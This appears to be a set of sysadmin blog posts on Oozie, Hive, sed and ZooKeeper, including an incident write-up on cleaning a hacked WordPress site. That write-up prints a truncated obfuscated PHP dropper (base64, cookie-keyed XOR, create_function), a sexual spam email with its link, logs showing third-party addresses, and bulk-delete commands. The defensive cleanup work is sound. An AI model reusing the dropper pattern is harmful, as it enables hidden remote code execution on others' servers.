Oozie SSH Action Failed With “externalId cannot be empty” Error

Last week I worked on an issue where a very simple SSH action run through Oozie kept failing with an "externalId cannot be empty" error. The workflow had just a single SSH action and nothing else. See the workflow example below:

<workflow-app name="SSH Action Test" xmlns="uri:oozie:workflow:0.5">
    <start to="ssh-5c4d"/>
    <kill name="Kill">
        <message>Action failed, error message[${wf:errorMessage(wf:lastErrorNode())}]</message>
    </kill>
    <action name="ssh-5c4d">
        <ssh xmlns="uri:oozie:ssh-action:0.1">
            <host>user1@another-server-url</host>
            <command>ls / &gt;&gt; /tmp/test.log</command>
            <capture-output/>
        </ssh>
        <ok to="End"/>
        <error to="Kill"/>
    </action>
    <end name="End"/>
</workflow-app>

The error message from the Oozie server looked like this:

2018-01-03 06:12:45,347 ERROR org.apache.oozie.command.wf.ActionStartXCommand: 
SERVER[{oozie-server-url}] USER[admin] GROUP[-] TOKEN[] APP[SSH Action Test] JOB[0000000-180103010440574-ooz
ie-oozi-W] ACTION[0000000-180103010440574-oozie-oozi-W@ssh-5c4d] Exception,
java.lang.IllegalArgumentException: externalId cannot be empty
        at org.apache.oozie.util.ParamChecker.notEmpty(ParamChecker.java:90)
        at org.apache.oozie.util.ParamChecker.notEmpty(ParamChecker.java:74)
        at org.apache.oozie.WorkflowActionBean.setStartData(WorkflowActionBean.java:503)
        at org.apache.oozie.command.wf.ActionXCommand$ActionExecutorContext.setStartData(ActionXCommand.java:387)
        at org.apache.oozie.action.ssh.SshActionExecutor.start(SshActionExecutor.java:269)
        at org.apache.oozie.command.wf.ActionStartXCommand.execute(ActionStartXCommand.java:232)
        at org.apache.oozie.command.wf.ActionStartXCommand.execute(ActionStartXCommand.java:63)
        at org.apache.oozie.command.XCommand.call(XCommand.java:286)
        at org.apache.oozie.service.CallableQueueService$CompositeCallable.call(CallableQueueService.java:332)
        at org.apache.oozie.service.CallableQueueService$CompositeCallable.call(CallableQueueService.java:261)
        at java.util.concurrent.FutureTask.run(FutureTask.java:262)
        at org.apache.oozie.service.CallableQueueService$CallableWrapper.run(CallableQueueService.java:179)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
        at java.lang.Thread.run(Thread.java:745)

We confirmed that the passwordless SSH connection from the Oozie server to the remote server worked correctly without issues.

After digging through the Oozie source code, I found that the failure was caused by the way Oozie executes the remote command: it uses Java's Runtime.exec() method, which does not behave like a shell. In particular, Runtime.exec() does not support I/O redirection at all. What happened under the hood was that Oozie split the full command "ls / >> /tmp/test.log" into the tokens "ls", "/", ">>" and "/tmp/test.log", and passed all of them to Runtime.exec(). When the command was executed, every token apart from "ls" was treated as an argument to the "ls" command. As you would expect, ">>" is not a file, so "ls" complained that the file does not exist and returned an exit status of 1 rather than 0.
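You can reproduce the effect from a shell by quoting ">>" so that it reaches "ls" as a literal argument, which is effectively what happens via Runtime.exec() (a minimal sketch; the exact error text depends on your ls version):

# No shell interprets the redirection here: ">>" and "/tmp/test.log"
# are passed to ls as literal file arguments, just as Runtime.exec() does.
ls / ">>" /tmp/test.log
# Expect something like: ls: cannot access '>>': No such file or directory
echo $?   # non-zero exit status, which is what Oozie sees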

Because the command failed, Oozie could not capture the PID of the remote process, hence the "externalId cannot be empty" error.

The workaround is simple: store the full command you want to run in a new script file on the remote host and ask Oozie to execute that script instead:

1. Create a file "ssh-action.sh" on the target host, for example under /home/{user}/scripts/ssh-action.sh
2. Add the command "ls / >> /tmp/ssh.log" to the file (a sketch of the script follows step 4)
3. Make the file executable by running:

chmod 744 /home/{user}/scripts/ssh-action.sh

4. Update the Oozie workflow to run the new shell script instead:

<ssh xmlns="uri:oozie:ssh-action:0.1">
    <host>user@remote-server-url</host>
    <command>/home/{user}/scripts/ssh-action.sh</command>
    <capture-output/>
</ssh>
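For reference, the script created in steps 1 and 2 can be as minimal as the sketch below (the shebang line is an assumption; any shell available on the remote host will do):

#!/bin/bash
# /home/{user}/scripts/ssh-action.sh
# The redirection now runs inside a real shell, which handles ">>" properly.
ls / >> /tmp/ssh.log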

And then the SSH action should work perfectly.

WordPress Hacked To Send Spam Emails

My website had been under attack by spammers for a while. I am not sure exactly when it started, but it went on for a couple of months. Due to work and family, I never got a chance to look into the cause and the solution until now.

Basically, my Postfix mail server kept sending out tens of thousands of emails. Possibly as a result, my server was blocklisted, and those emails were rejected or timed out connecting to the remote mail servers, as shown in the /var/log/syslog messages below:

....
Jan  1 04:06:25 xx-xxx-xxx-xxx postfix/smtp[8201]: connect to mx.vgs.untd.com[64.136.52.37]:25: Connection timed out
Jan  1 04:06:25 xx-xxx-xxx-xxx postfix/smtp[8201]: BA77C42589: to=<randj152@netzero.com>, relay=none, delay=650, delays=589/0.08/61/0, dsn=4.4.1, status=deferred (connect to mx.vgs.untd.com[64.136.52.37
]:25: Connection timed out)
Jan  1 04:06:25 xx-xxx-xxx-xxx postfix/smtp[8202]: connect to mta7.am0.yahoodns.net[98.137.159.24]:25: Connection timed out
Jan  1 04:06:25 xx-xxx-xxx-xxx postfix/smtp[7735]: connect to mail20.voith.com[193.169.205.223]:25: Connection timed out
Jan  1 04:06:25 xx-xxx-xxx-xxx postfix/smtp[7735]: 12C75425D2: to=<gerald.franke@ditis.de>, relay=none, delay=449, delays=388/0/61/0, dsn=4.4.1, status=deferred (connect to mail20.voith.com[193.169.205.
223]:25: Connection timed out)
Jan  1 04:06:26 xx-xxx-xxx-xxx postfix/smtp[8200]: connect to smtpin01.mc.a.cloudfilter.net[52.204.45.50]:25: Connection timed out
Jan  1 04:06:26 xx-xxx-xxx-xxx postfix/smtp[8200]: A893942583: to=<garylmiller@mchsi.com>, relay=none, delay=650, delays=589/0.1/61/0, dsn=4.4.1, status=deferred (connect to smtpin01.mc.a.cloudfilter.ne
t[52.204.45.50]:25: Connection timed out)
Jan  1 04:06:26 xx-xxx-xxx-xxx postfix/smtp[8199]: connect to mx2.earthlink.net[209.86.93.227]:25: Connection timed out
Jan  1 04:06:27 xx-xxx-xxx-xxx postfix/smtp[8186]: connect to mail.thunderworx.net[217.27.32.193]:25: Connection timed out
Jan  1 04:06:27 xx-xxx-xxx-xxx postfix/smtp[8191]: connect to mx-b.ktk.de[82.115.96.243]:25: Connection timed out
Jan  1 04:06:27 xx-xxx-xxx-xxx postfix/smtp[8191]: D2322425C2: to=<carsten.leonhardt@rz-online.de>, relay=none, delay=451, delays=388/0.08/63/0, dsn=4.4.1, status=deferred (connect to mx-b.ktk.de[82.115
.96.243]:25: Connection timed out)
Jan  1 04:06:28 xx-xxx-xxx-xxx postfix/smtp[7767]: connect to cax.virusfree.cz[31.7.241.25]:25: Connection timed out
Jan  1 04:06:30 xx-xxx-xxx-xxx postfix/smtp[8198]: connect to rpi0i001.laposte.fr[178.213.67.9]:25: Connection timed out
Jan  1 04:06:35 xx-xxx-xxx-xxx postfix/smtp[8186]: C09304258C: to=<chrioannouresta@primehome.com>, relay=mail-mx100.thunderworx.net[217.27.32.90]:25, delay=660, delays=589/0.08/67/3.1, dsn=5.0.0, status
=bounced (host mail-mx100.thunderworx.net[217.27.32.90] said: 550-Verification failed for <jayden.w@blog.ericlin.me> 550-Called:   74.125.206.26 550-Sent:     RCPT TO:<jayden.w@blog.ericlin.me> 550-Respon
se: 550-5.1.1 The email account that you tried to reach does not exist. Please try 550-550-5.1.1 double-checking the recipient's email address for typos or 550-550-5.1.1 unnecessary spaces. Learn more at
550-550 5.1.1  https://support.google.com/mail/?p=NoSuchUser e193si20747180wmf.133 - gsmtp 550 Sender verify failed (in reply to RCPT TO command))
Jan  1 04:06:35 xx-xxx-xxx-xxx postfix/cleanup[8206]: C2889426F7: message-id=<20180101040635.C2889426F7@xx-xxx-xxx-xxx.ap-southeast-2.compute.internal>
Jan  1 04:06:35 xx-xxx-xxx-xxx postfix/bounce[8410]: C09304258C: sender non-delivery notification: C2889426F7
Jan  1 04:06:35 xx-xxx-xxx-xxx postfix/qmgr[4888]: C2889426F7: from=<>, size=5065, nrcpt=1 (queue active)
Jan  1 04:06:35 xx-xxx-xxx-xxx postfix/qmgr[4888]: C09304258C: removed
.......

I searched on Google, and it turned out that my WordPress-powered blog was infected with malware that kept sending out emails. A common suggestion is to search the installation for the function "base64_decode", which spammers' scripts commonly use to hide their payloads. I did the search, and it turned out there were lots of such files under my WordPress installation directory:

ericlin@localhost: $ sudo grep -ri 'base64_decode' * | grep create_function
wp-admin/css/lfiendwt.php:	$_sxbiv = create_function ('$hyplio', sxbiv (base64_decode (
wp-admin/images/uczftagb.php:	$_ondxf = create_function ('$hkkcxn', ondxf (base64_decode (
wp-content/plugins/wp-connect/rbvphaub.php:	$_afchu = create_function ('$bbmmqr', afchu (base64_decode (
wp-content/plugins/googleanalytics/wrhnumao.php:	$_aparnlc = create_function ('$ezkeul', aparnlc (base64_decode (
wp-content/themes/alexandria/qkvejyid.php:	$_barsl = create_function ('$xwbnc', barsl (base64_decode (
wp-content/plugins/wp-connect/hzrttagh.php:	$_txkmjnd = create_function ('$rbeeug', txkmjnd (base64_decode (
wp-includes/rest-api/fields/aokjutfe.php:	$_barsl = create_function ('$xwbnc', barsl (base64_decode (
wp-includes/Requests/Exception/umbiwtox.php:	$_mrbqv = create_function ('$rdscfs', mrbqv (base64_decode (
wp-includes/SimplePie/HTTP/ljwvhrtn.php:	$_hapmrsb = create_function ('$qujqu', hapmrsb (base64_decode (
wp-includes/rest-api/blimaumt.php:	$_mrbqv = create_function ('$rdscfs', mrbqv (base64_decode (
wp-includes/Text/Diff/htzqhesw.php:	$_hapmrsb = create_function ('$qujqu', hapmrsb (base64_decode (
wp-includes/images/smilies/xraatxme.php:	$_sxbiv = create_function ('$hyplio', sxbiv (base64_decode (
wp-includes/Requests/Response/tlpeqczj.php:	$_mrbqv = create_function ('$rdscfs', mrbqv (base64_decode (
wp-includes/Requests/Cookie/dnwuvidm.php:	$_txkmjnd = create_function ('$rbeeug', txkmjnd (base64_decode (
wp-includes/SimplePie/Parse/rnylhylq.php:	$_dempkwj = create_function ('$dgeirfu', dempkwj (base64_decode (
wp-includes/SimplePie/XML/qmnfjezi.php:	$_esufzf = create_function ('$mcxgan', esufzf (base64_decode (
.......

The content of those files looked something like this:

<?php

        $majsvj =
                'cmQ9aXMtYXJyJzokb2RlIEVPJHZhJiYkXXswaWYoUkVBLlswSU5VZW5hQXJydWJsaXM'.
                'tcmV0aW9udCgkaHVuZW5zbiIpPmhlaG9zYXRjKCdTbXM7OGJpeVsxbGljYXJ0bGwsZW'.
                'QgJ3BjdW5kO2lmYW1lLDI1KCRhOV0pKCRwRXJyZywkPjpbcmlucmVwO31mLT52ZX19X'.
                'Xsxc2V7dGVjLT5EdGY4cm90MF0sPWV4Z2U7cGxhbWU9J1hPcigkbVJlYyAkdGlvKTsk'.
                'O31ycm4gLjAufWlmdGhpMSkkZ2ljTV9DdWJsb3N0Z25lWzBdcigpaWVucnJvNjF9fX1'.
                .......
                'pLG51JztwaW4sc2VsY29kPlxcMSkoaW5faXNwaztjb25ueV9waWMgbnVsaz0w';

        $_ondxf = create_function ('$hkkcxn', ondxf (base64_decode (
                'XUUCVBMZGBNODVpVTQdBTQFSSwdUBjldBFBcXAMZFRAfawhhfW4AVzc6BQByJiM0OXZ'.
                'qKzZwDVY1YgNyIW5gYX1iNXJxaldXJypmdHEkUQEsdk8zM2cOaDBlZl8CanNIfmFTen'.
                'h4ZXo2MF9eYzA2HSpxCVI0dyRBIHZlSwB+Y1RcdgtqZWFiZSwjU3B+ORkNKHZtOzdkN'.
                '2sFdkt6JWpeXFp2MXZ+fnFQNyVmf3gwBiQHdW0sIGBWVih0dmEzfFlLYnYIXHFjSGUs'.
                'NWJ3eCRRFgBifRY2elZjNntiVzBrZ3J+awt2aXhydjU2WHBlM1EzOXBQCQZzN04nZkR'.
                .......
                'xZcDF1UXFyZSo0XFlvMCQoAGZ6IzN0HmsidFRPMGtkcl1iUmJ8eEcHNTZYQnQwJzwsZ'.
                'lU4MGowTQJxAggyfGdqemdTS2N8ZVskJQRneSdQJClwbicHZFZeKHZEBVseHBQYFzx7'.
                'fHZ7eiNCb0JBEz4XBkNUAwFXTh5PFB8YQWYSFBgXPGt2a2Z2NDkTeWE1MTorfGs2RW9'.
                'PZEgaGg=='
        ), $_COOKIE [str_replace('.', '_', $_SERVER['HTTP_HOST'])]) . ';'); $_ondxf($hkkcxn);

        function ondxf ($fnjkaz, $gifntn) { return $fnjkaz ^ str_repeat ($gifntn, ceil (strlen ($fnjkaz) / strlen ($gifntn))); }

As the code shows, each dropper builds a function body by XOR-decoding an embedded base64 blob with a key supplied in a request cookie, then executes it. To fix the issue, I just needed to remove those files, so I ran the command below:

sudo grep -ri 'base64_decode' * | grep create_function | cut -d ":" -f 1 | xargs sudo rm -f

The file contents may differ in your case, so it is best to scan through the installation and look for files with random names like the ones listed above.
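One additional, hedged way to spot such droppers, assuming a WordPress root of /var/www/wordpress (adjust the path and time window to your setup), is to list recently modified PHP files:

# PHP files changed in the last 30 days; core files rarely change
# outside of WordPress upgrades, so recent ones deserve a look.
sudo find /var/www/wordpress -name '*.php' -mtime -30 -ls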

Once all the files were cleaned up, I also needed to delete all the queued mail in Postfix so that the log files would not keep being flooded:

# Delete all queued mail
sudo postsuper -d ALL

# Delete deferred mail queue messages - the ones the system intends to retry later
sudo postsuper -d ALL deferred

Then restart the Postfix server:

sudo service postfix restart

If for some reason the emails keep coming back, check the queue with "mailq":

mailq

-Queue ID-  --Size-- ----Arrival Time---- -Sender/Recipient-------
5C98D675BB*    1659 Mon Nov  6 02:31:30  info@arbeitsagentur.de
                                         cathrine.huth@t-online.de

401A1665FD*    1659 Wed Nov  8 03:01:37  info@arbeitsagentur.de
                                         horstauerbach@aol.com

702DD66A51*    1709 Tue Nov  7 01:56:54  jobs@arbeitsagentur.de
                                         d.ahmadyassin@yahoo.com

You will need to check the details of each email to find the script that generated it:

postcat -vq 5C98D675BB

The output looks like this:

*** ENVELOPE RECORDS deferred/8/8FD2542696 ***
message_size:            1816             203               1               0            1816               0
message_arrival_time: Mon Jan  1 04:03:49 2018
create_time: Mon Jan  1 04:03:49 2018
named_attribute: rewrite_context=local
sender_fullname: www-data
sender: corazana.a@blog.ericlin.me
*** MESSAGE CONTENTS deferred/8/8FD2542696 ***
regular_text: Received: by xx-xxx-xxx-xxx.ap-southeast-2.compute.internal (Postfix, from userid 33)
regular_text:   id 8FD2542696; Mon,  1 Jan 2018 04:03:49 +0000 (UTC)
regular_text: To: jmprevenga@telefonica.net
regular_text: Subject: =?utf-8?Q?Quieres_pasar_la_Navidad_en_compa=C3=B1=C3=ADa_de_la_morena=3F?=
regular_text: X-PHP-Originating-Script: 33:rooguols.php(1189) : runtime-created function(1) : eval()'d code(1) : eval()'d code
regular_text: Date: Mon, 1 Jan 2018 04:03:49 +0000
regular_text: From: "Corazana A." <corazana.a@blog.ericlin.me>
regular_text: Message-ID: <f5cf2b20105dcc13231bd56f3d95f21e@blog.ericlin.me>
regular_text: X-Mailer: PHPMailer 5.2.23 (https://github.com/PHPMailer/PHPMailer)
regular_text: MIME-Version: 1.0
regular_text: Content-Type: multipart/alternative;
regular_text:   boundary="b1_f5cf2b20105dcc13231bd56f3d95f21e"
regular_text: Content-Transfer-Encoding: 8bit
regular_text:
regular_text: This is a multi-part message in MIME format.
regular_text:
regular_text: --b1_f5cf2b20105dcc13231bd56f3d95f21e
regular_text: Content-Type: text/plain; charset=utf-8
regular_text: Content-Transfer-Encoding: 8bit
regular_text:
regular_text: Conoceré con el chico para sexo.
regular_text:
regular_text: Está dispuesta a formar la compañía para la Navidad!
regular_text:
regular_text: Garantizo el sexo loco, me encanta hacer la mamada.
regular_text:
regular_text: { http://wayfordailylife.com/happen.php?utm_source=6900l7jut1&utm_medium=408exztblt&utm_campaign=gqb6rn8318&utm_term=9oign62f71&utm_content=yhlzo7pqn1 } Mi formulario está sólo aquí!
regular_text:
regular_text:
regular_text: --b1_f5cf2b20105dcc13231bd56f3d95f21e
regular_text: Content-Type: text/html; charset=utf-8
regular_text: Content-Transfer-Encoding: 8bit
regular_text:
regular_text: <html>
regular_text: <body>
regular_text: Conoceré con el chico para sexo.<br>
regular_text: <br>
regular_text: Está dispuesta a formar la compañía para la Navidad!<br>
regular_text: <br>
regular_text: Garantizo el sexo loco, me encanta hacer la mamada.<br>
regular_text: <br>
regular_text: <a href="http://wayfordailylife.com/happen.php?utm_source=6900l7jut1&utm_medium=408exztblt&utm_campaign=gqb6rn8318&utm_term=9oign62f71&utm_content=yhlzo7pqn1">Mi formulario está sólo aquí!</a><br>
regular_text: </body>
regular_text: </html>
regular_text:
regular_text:
regular_text:
regular_text: --b1_f5cf2b20105dcc13231bd56f3d95f21e--
regular_text:
*** HEADER EXTRACTED deferred/8/8FD2542696 ***
named_attribute: encoding=8bit
named_attribute: dsn_orig_rcpt=rfc822;jmprevenga@telefonica.net
original_recipient: jmprevenga@telefonica.net
recipient: jmprevenga@telefonica.net
*** MESSAGE FILE END deferred/8/8FD2542696 ***

Look for the following line:

regular_text: X-PHP-Originating-Script: 33:rooguols.php(1189) : runtime-created function(1) : eval()'d code(1) : eval()'d code

You can see that the email was generated by the script rooguols.php. Search for this file in the WordPress directory and remove it, then repeat the process until all offending files are identified and removed.
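A simple find helps to locate it (the WordPress root path below is an assumption; point it at your own installation):

# Locate the offending script so it can be inspected and removed.
sudo find /var/www/wordpress -name 'rooguols.php'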

Keep watching the output of "mailq" to make sure no new spam emails are generated.
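For example, re-run it periodically with watch (assuming watch is available on your distribution):

# Refresh the queue listing every 60 seconds; if it stays empty,
# the cleanup has held.
watch -n 60 mailq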

Hopefully this will also help anyone who runs into the same issue on their WordPress blog server.

Extract Lines Between Two Patterns From A File

Yesterday, I was trying to restore one of my old blog sites, written in Chinese, so that I could continue blogging there. I had the MySQL database backed up in a SQL dump file. However, I noticed that I had dumped all databases into one file, which stopped me from loading the full dump back into MySQL, as it contained other databases I could not simply load in, like the "mysql" system database.

So my goal was simple: extract this particular database from the dump file.

Method 1:

Examining the dump file, I could see that the databases were separated by lines like the following:

-- Current Database: `db1`
-- Current Database: `db2`
-- Current Database: `db3`
-- Current Database: `db4`
-- Current Database: `db5`
-- Current Database: `db6`
....

Thanks to this thread on StackOverflow, the solution is simple: run the command below to extract all lines between "Current Database: `db4`" and "Current Database: `db5`":

sed '/Current Database: `db4`/,/Current Database: `db5`/!d' dump.sql > db4.sql

The command above finds the lines matching "Current Database: `db4`" and "Current Database: `db5`" and deletes everything that is NOT between those two lines: "," defines the range, and "!d" means "if not in the range, delete". Note that both boundary lines are included in the output; see the variant below if you want to drop the trailing one.
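If you do not want that trailing "db5" marker line in the extracted file, a slightly longer sed form prints the range while suppressing the closing boundary:

# Print the db4..db5 range, but skip the line matching the end pattern.
sed -n '/Current Database: `db4`/,/Current Database: `db5`/{/Current Database: `db5`/!p;}' dump.sql > db4.sql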

Method 2:

Firstly grep the pattern and print out the line numbers:

ubuntu@localhost:~/chenhui$ grep -n 'Current Database' dump.sql
19: -- Current Database: `db1`
382: -- Current Database: `db2`
744: -- Current Database: `db3`
1137: -- Current Database: `db4`
3401: -- Current Database: `db5`
5604: -- Current Database: `db6`
....

Then use those line numbers to capture all lines in between:

sed -n 1137,3401p dump.sql > db4.sql
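As a side note, awk supports the same pattern ranges directly, which avoids looking up the line numbers first:

# Print from the db4 marker to the db5 marker, inclusive.
awk '/Current Database: `db4`/,/Current Database: `db5`/' dump.sql > db4.sql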

More information can be found in this blog post.

Hope the above helps!

Hive CLI Prints SLF4J Error to Standard Output

If you have both Hive and Spark running on the same cluster, chances are that the Hive CLI will produce the following WARNING messages upon exit of each session:

WARN: The method class org.apache.commons.logging.impl.SLF4JLogFactory#release() was invoked. 
WARN: Please see http://www.slf4j.org/codes.html#release for an explanation.

A sample of the full output looks like this:

[root@localhost ~]# hive -e "show tables;"

Logging initialized using configuration in jar:file:/opt/cloudera/parcels/CDH-5.12.1-1.cdh5.12.1.p0.3/jars/hive-common-1.1.0-cdh5.12.1.jar!/hive-log4j.properties
OK
sample_07
sample_08
web_logs
Time taken: 1.281 seconds, Fetched: 3 row(s)
WARN: The method class org.apache.commons.logging.impl.SLF4JLogFactory#release() was invoked.
WARN: Please see http://www.slf4j.org/codes.html#release for an explanation.

Even though the Hive CLI has been deprecated in CDH, lots of enterprise users are still stuck with it for legacy reasons, and it is not easy for them to migrate to Beeline or to query Hive through ODBC or JDBC in their applications.

This is not an issue if you just run the Hive CLI from the command line and view the output. However, if you want to capture the result set from the CLI's stdout, it becomes a problem; see the test case below:

[root@localhost ~]# output=`hive -e "show tables;"`

Logging initialized using configuration in jar:file:/opt/cloudera/parcels/CDH-5.12.1-1.cdh5.12.1.p0.3/jars/hive-common-1.1.0-cdh5.12.1.jar!/hive-log4j.properties
OK
Time taken: 1.281 seconds, Fetched: 3 row(s)

And when you echo the variable $output, it contains the WARNING messages:

[root@localhost ~]# echo $output
sample_07
sample_08
web_logs
WARN: The method class org.apache.commons.logging.impl.SLF4JLogFactory#release() was invoked.
WARN: Please see http://www.slf4j.org/codes.html#release for an explanation.

If you then feed this output into another part of your application, things will break.

This happens because of the code below in Hive's launcher script (/opt/cloudera/parcels/CDH/lib/hive/bin/hive), which loads Spark's assembly JAR into Hive's CLASSPATH:

# add Spark assembly jar to the classpath
if [[ -n "$SPARK_HOME" && !("$HIVE_SKIP_SPARK_ASSEMBLY" = "true") ]]
then
  sparkAssemblyPath=`ls ${SPARK_HOME}/lib/spark-assembly-*.jar`
  CLASSPATH="${CLASSPATH}:${sparkAssemblyPath}"
fi

Luckily, since CDH 5.12.0 Cloudera has backported the upstream JIRA HIVE-12179, which added a check for an environment variable called "HIVE_SKIP_SPARK_ASSEMBLY". We can use this variable to disable the loading of the Spark JAR for the Hive CLI if we do not need to use Hive on Spark.

So the workaround is as simple as setting "HIVE_SKIP_SPARK_ASSEMBLY" to "true" so that the "if" block above is skipped. See the example below:

[root@localhost ~]# output=`export HIVE_SKIP_SPARK_ASSEMBLY=true; hive -e "show tables;"`

Logging initialized using configuration in jar:file:/opt/cloudera/parcels/CDH-5.12.1-1.cdh5.12.1.p0.3/jars/hive-common-1.1.0-cdh5.12.1.jar!/hive-log4j.properties
OK
Time taken: 1.281 seconds, Fetched: 3 row(s)

And the captured output will be clean, as shown below:

[root@localhost ~]# echo $output
sample_07
sample_08
web_logs
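If you rely on this often, you could export the variable once in your shell profile instead of setting it per command (an assumption about your environment; adjust the profile file to your shell):

# Make the setting permanent for this user.
echo 'export HIVE_SKIP_SPARK_ASSEMBLY=true' >> ~/.bashrc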

This workaround will not work if you need Hive on Spark in the Hive CLI, because it essentially disables the loading of the Spark JAR (though you could filter the WARN lines instead; see the sketch below). And of course, using the Hive CLI is strongly NOT recommended; migrating to Beeline, or using ODBC/JDBC to connect to HiveServer2, is the right way to go in the long run.
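If you do need Hive on Spark and therefore cannot skip the Spark assembly, one blunt alternative (my own sketch, not something from HIVE-12179) is to filter the WARN lines out of the captured output:

# Crude filter: strips the SLF4J WARN lines from stdout, but would also
# drop any legitimate result row that happens to start with "WARN: ".
output=$(hive -e "show tables;" | grep -v '^WARN: ')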

Hope the above information helps.

Hive Long Queries Causing ZooKeeper Fail With OutOfMemory Error

I have seen lots of Hadoop users who do not use the technology the way it was designed. Hadoop is built for Big Data: it works well with large files, which is why the HDFS block size is commonly set to 256MB or 512MB depending on the use case. However, lots of users, even at big corporations, defeat this design by keeping lots of small files and partitions in a given Hive table. Some users have millions of partitions and hundreds of millions of files stored in HDFS, each only KBs in size. This puts a lot of pressure on every component in the Hadoop ecosystem: HDFS, HiveServer2, Impala and ZooKeeper, just to name a few.

In this post, I am going to discuss one side effect of this usage pattern: combined with very long Hive query strings, it can crash ZooKeeper with an OutOfMemory error.

Here is what happened:

1. A user runs a Hive query whose text is very long (say, 100KB of characters)
2. The query runs against a table with millions of partitions
3. The query scans about 20,000 of those partitions
4. Since hive.support.concurrency=true, Hive tries to create one ZNode per partition in ZooKeeper while the query runs, to mark those partitions as locked
5. Hive also stores the full query string in each ZNode for debugging purposes, so that when an issue happens, users can check the ZNode and see which query holds the lock (see the sketch after this list)
6. With 20,000 partitions at 100KB each, this single query alone creates about 2GB of data in ZooKeeper
7. With a few similar queries running concurrently, ZooKeeper can hit its memory limit in no time
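If you want to see what is accumulating, you can inspect the lock ZNodes with the ZooKeeper CLI. Below is a hedged sketch; the server address and namespace path are assumptions, so check hive.zookeeper.namespace in your hive-site.xml first:

# List Hive's lock ZNodes (host and path here are for illustration only).
zookeeper-client -server zk-host:2181 ls /hive_zookeeper_namespace_hive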

To mitigate this problem, Hive introduced a new setting to control the number of characters stored in each ZNode in this scenario, via upstream JIRA HIVE-16334, which has been backported into CDH since 5.12.0.

However, the default limit is 1MB (1,000,000 bytes), which is still large enough for the above case to happen. To work around this, we can simply reduce the number of characters of the query string being stored, say to 10K. (The query string is stored purely for debugging, so in theory we could make it very small, but that would hamper troubleshooting of other issues; 10K should be a good starting point.)

To do so, follow the steps below (assuming you are using Cloudera Manager):

1. Go to CM > Hive > Configuration > HiveServer2 Advanced Configuration Snippet (Safety Valve) for hive-site.xml
2. Enter the following into the text area (view as XML):

<property>
    <name>hive.lock.query.string.max.length</name>
    <value>10000</value>
    <description>The maximum length of the query string to store in the lock. Set it to 10K.</description>
</property>

3. Save and restart HiveServer2
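Once HiveServer2 is back up, you can verify the new value from Beeline (the JDBC URL below is an assumption; use your own HiveServer2 address):

# Print the effective value of the new property.
beeline -u jdbc:hive2://hs2-host:10000 -e "set hive.lock.query.string.max.length;"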

After that, we should have a much lower chance of hitting ZooKeeper OutOfMemory in the above scenario. However, the root cause is having too many partitions, so the first priority is to reduce the partition count as much as possible, so that each query scans no more than about 1,000 partitions; that is also what gets you good performance.

For users on CDH older than 5.12.0, the suggestion is to upgrade.

Hope the above helps.